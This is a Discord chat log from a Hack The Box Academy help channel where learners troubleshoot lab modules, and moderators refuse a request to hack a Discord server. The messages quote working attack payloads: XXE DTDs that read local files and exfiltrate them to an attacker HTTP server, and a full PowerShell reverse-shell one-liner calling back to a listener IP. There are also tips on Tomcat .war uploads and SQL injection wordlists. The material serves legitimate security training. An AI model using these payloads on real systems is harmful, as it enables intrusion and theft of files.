and likewise for the password field if it's masked

but there are possibilities to be able to bypass it as well

yes but for the sake of simplicity

let's assume that there's proper input sanitization on the backend that would not allow it

if it's inadequate, you can bypass it. but most email parameters i've tested have adequate validation and sanitization

and, of course, you don't want to waste your time on something like that when there are possibly other vulnerabilities on the web app

^

don't narrow your focus when the vuln could be the next parameter down

I was thinking of some more sophisticated bypass but I guess ignoring those fields is fine for now, thanks

there is an advanced XSS + CSRF module, maybe it has some bypasses

but i doubt it

1. do you have permission to do on your friends server
2. it depends
3. read #rules and #welcome

if the answer to 1 is no: it's illegal, point blank

that's illegal and against discord TOS

if you're referring to hacking a discord server to give roles, that's extra illegal

yes and the roles are open

but idk how to give me it

skill issue

but HTB does not teach how to hack discord

<@&861185840277487616>

this channel is specifically regarding getting help with HTB academy modules

@stable fossil bye bye

not helping skids hack discord servers

bro its my friend

don't care

this server is not about hacking discord servers. Period

end of discussion

do not pass go

do not collect $200

im albanian

https://tenor.com/view/jail-right-to-jail-right-away-parks-and-recreation-parks-and-rec-gif-16177531

ok and?

k

Discord is a US based company

we dont have dollores

really... that's the thing you're stuck on?

when my whole point is: Stop Asking

thats not sigma

neither is hacking a discord server my guy

if you wanna learn go ask google for tips and tricks, surely that will go well

but this server is not about hacking other discord servers, which is against Discord ToS

don't be rude, thank you

hi Mick

https://tenor.com/view/wallace-wensleydale-hammer-gif-20832217

I'm currently doing "Web Attacks - Advanced file Disclosure" module. Can you tell me why it is not showing the proper response as seen on the module?

I did this to create the file:

Kojin@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
Kojin@htb[/htb]$ python3 -m http.server 8000

Here's my other syntax:

<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.16.8:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>

I even applied:

<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->

I can't seem to get the expected output as seen in the module.

try other methods from that section

not just CDATA

Hi mates, if i have a question about 'SEA', can i ask here? i really don't get the xxs,js triggered

#1271890150863143096

#1271890150863143096 read and follow #welcome to access

no access

see literally the message above this

read and follow #welcome to access

Imagine being the guy who developed Tomcat

i mean it's mostly because if you have admin panel access to tomcat, or cgi access

it's gg

with tomcat manager/admin panel access -> upload .war file and it's gg no-re

No

Crazy

Question, in the ssh pivitoing with Sshuttle, what is the username we use to get access to the linux pivot machine?

isn't it the case for wordpress, joomla, and drupal too? Admin access

typical, <excuse> - <ask about something illegal>

it's pretty much for all applications meant to be run internally

I mean these apps are accessible to anyone

yes but tomcat is meant to be internally facing, not externally facing

that's why it's so easy to pwn

Will it be ubuntu? hour htb academy username? I really appreciate the help!

our*

cool

ye

most of the time it's weakly configured due to it being internal

so most people assume "eh it's internal, no way they'll find it"

guys anyone that can explain me how to find possible suffix/prefix in a real world scenario in sql injection, please?

easy if it's whitebox since you have access to source code

if blackbox, you need to determine how the SQL query is structured

burpsuite intruder and sqli wordlist

unless you have a more specific question

and the error log of sqlmap of the payload can help me in that?

not familiar with the error log so i can't say

but it's more general, no?

whats more general?

ah ok thanks, because i thought that for example, if i see a syntax error, i could infer how the query is structured

if you have access to error output, you can probably figure it out

yeah i mean once you get a specific response you know you've broken the sql query and from there you exploit it right
tbh most of the time i just spray the user controlled input with a sqli wordlist

but if there isn't any error output, it's a lot more difficult

right

ok thanks, so it's more difficult to predict these things if we are on a blackbox testing, right?

that's illegal

i would say, if i don't have the source code, and no error output, it's more difficult to infer the structure of query

Yup

oh yeah that's very true

it might be something you'd table until you couldnt find anything else
and have some degree of confidence its the right path to go down

But thankfully people have done a lot of the hard work for you

Like PayloadAllTheThings

referring to the sqli payload wordlists?

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection

yep

but this types of payloads, are not alredy included in sqlmap?

Will the spawning machines ever be fixed?

I've had this happen a few times when doing modules

It's a handy cheatsheet

ah ok thanks so much @fathom pendant @hard matrix @dim wolf

its good to do manual enum too if your automated stuff doesn't pan out

okok thanks, however its a methodology that requires a lot of time. So i can think that i can test it as last resort

where can i find the first hacking module at? im new

I'm currently doing the last part of "Web Attacks - Blind Data Exfiltration" module. I noticed in this section that the suppose content of xxe.dtd file has not been mentioned? Do I have to delete the contents of the file to make it work?

It's just a thought since the content was for a different section of the module but currently I have to referenced it in this section:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>

The only file that I create for this section is this syntax:

<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>

The dtd is given at the start of the section

Is it this one?

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Yer

I was confused, thanks for clarifying.

During the xxe sections I named the separate DTDs according to the section

And adjusted accordingly

That's a helpful tip. Thank you.

f**ck thick client application 2 days I've been working on it

ah

decompiling the java and recompiling is a bitch ain't it

i heavily suggest the 'fatty' walkthrough by ippsec

as that's the box this section is lifted off of

as you can note the box is rated insane

I had to de/recompile it 5 times to finally understand that it was necessary to link the 2 operations of traversal and file download to download the server.

yeah if you're trying to follow the reading...it SUCKS at explaining

it's why you'll have better luck following along with a writeup of the box 'fatty' as ippsec actually explains things

I think 0xdf also has a writeup for it

thanks I'll try to do it again on this box when I have time.

but yeah

that's by far the worst section in all the modules ever, and that's not even a hot take

yeah I admit in real life when you succeed you say to yourself ah yeah cool in fact but damn the reasoning you have to have to think of decompiling the program in order to modify some functions from the source then recompile I would never have believed it was possible

i say it's terrible because by the end you don't even feel satisfied when you figure it out/get to the end

you're just "thank god that's over"

like the LEAST satisfying section

I laughed out loud ahahahah, I swear I thanked him 10 times.

IMO the instructions in the section are WAY too fast-paced

yeah should do something more detailed for noobs as me it would avoid to spend 2 days on it

but well it’s just a bad nightmare we go ahead ahah

https://tenor.com/view/it-seems-the-worst-is-over-the-bad-is-in-the-past-peter-hermann-charles-brooks-younger-gif-14726529

https://tenor.com/view/denzel-washington-my-heart-omg-beautiful-relieved-gif-18461646

I've had ffuf running for like 1.5 hours on intro to web, subdomain bruteforcing

Is there a specific word list they want?

It shouldn't take 1.5 hours

That should've been your first hint something was wrong

that's probably a little too long for a bruteforce
someone mentioned earlier to use the top-x-million 3 wordlists in seclists

also make sure you increase threads

Yep

Also with ffuf for subdomains against a private (10.129.x.x) target you need to use -H "Host: FUZZ.domain.htb"

As well as targets that may not be running DNS

Well tbf I just walked away for a bit LOL

This just has the inlandfright.com which is a public address

Turn off your vpn see if that fixes

Sometimes it's dumb

Okay ill give that a try

Yeah it never got through the list to begin with cause it's been so slow

HTB operates a good bit different from offsec so been a bit jarring

Anyone know if you can buy cod points on here

Also sometimes switching your networking mode from NAT --> bridged also fixes it

No

You buy cod points from the cod store

Hth

Hi

I'm having a bit of a problem with this reverse shell that htb supplied

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

when I run this on the target machine (with the modified IP ofc) it gives errors

what errors

•                                                             ~
  

Unexpected token ')' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try again.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ExpectedExpression

how are you using this reverse shell payload

I am copying and pasting it into powershell

and im running it as administrator

what is the context

im trying to establish a reverse shell with the victim and my machine

that is the reverse shell payload that was given to me by htb

well of course you are but that doesn't tell me anything

what module is this

section name, question, ..

run this from cmd

not from powershell

shells and payloads module (reverse shells)

thank u let me try

thanks it worked...could u pls explain why it worked from cmd and not powershell 😅

running in cmd or encoding the payload should work

thanks, could u pls explain why

because that's what the payload is for, cmd

ahh I see

powershell handles specific characters differently than cmd

ohh

^

thanks a lot guys :))

that's why i always use encoded powershell payload

you can likely change the language in the revshells website to be for powershell specifically

but the revshells payload is from the perspective of you running the commands (by default) in cmd

that still needs to be ran in cmd afaik

runs fine in powershell

¯_(ツ)_/¯

last time i checked at least

been a hot minute though since i've done that module to test

i'll test it out on my own machine real quick

i am trying to get a reverse shell from my windows machine using the reverse shell payload that I pasted earlier and im trying from cmd but it gives errors again 😅

At line:1 char:485
+ ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+                                                           ~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull```

works in powershell

hm TIL

it's just certain things that don't work cross cmd/powershell (like quotes, braces,...)

u guys know why ?

nope

something tells me though it's because it couldn't connect to your listener

so it errors out

¯_(ツ)_/¯

ahh I see

im using linux on my vm and trying to connect to my normal windows

Who here uses obsidian?

yea wadup

depends on networking of your vm <-> host machine

me

ahh I see

so its like the bridged/NAT network etc?

some networking modes don't allow it

https://www.virtualbox.org/manual/ch06.html

yeah if you're using nat networking (default) the guest machine (vm) will have an ip address on another subnet
bridged will have an ip from on same subnet as host iirc
but i use vmware workstation, not sure what you're using

ohh ok, Im using vbox

same concept applies in most hypervisors really

really need to setup a proper homelab

It's a connection related issue

I wrote script to scrape all of the modules and sections from HTBA for taking notes. (wish I did this years ago). To create an obsidian vault.
Next step is linking them and tagging. And going back through almost half of the content I have already covered to take substantial notes. Two questions. Is there an api for the academy so I don't have to keep using that beautiful soup? What do you find the best strategy for keeping your notes linked and tagged in obsidian?

ahh I see thanks

this will not be helpful tbh

my notes are a garbled spaghetti mess that i've linked along the way when i came across like-topics

You guys take notes?

but also if you haven't paid for the module, then that's likely theft of paid content and can get you in a ton of trouble

there's no public API

as stated earlier

you'd have to dig around and find it

don't think they're suggesting that at all - they're just grabbing the material they've already paid for

as long as they're not distributing it, i don't see the problem.

the wording is vague

i have tons of screenshots from the module material

didn't pay = pirating; doesn't matter if they're not distributing

if they paid for the content that's a different story

failure on htb's part if he's even able to access modules he hasn't paid cubes for

i believe if you try and interact with an academy page you haven't paid for though it redirects you to the overview if you haven't paid for it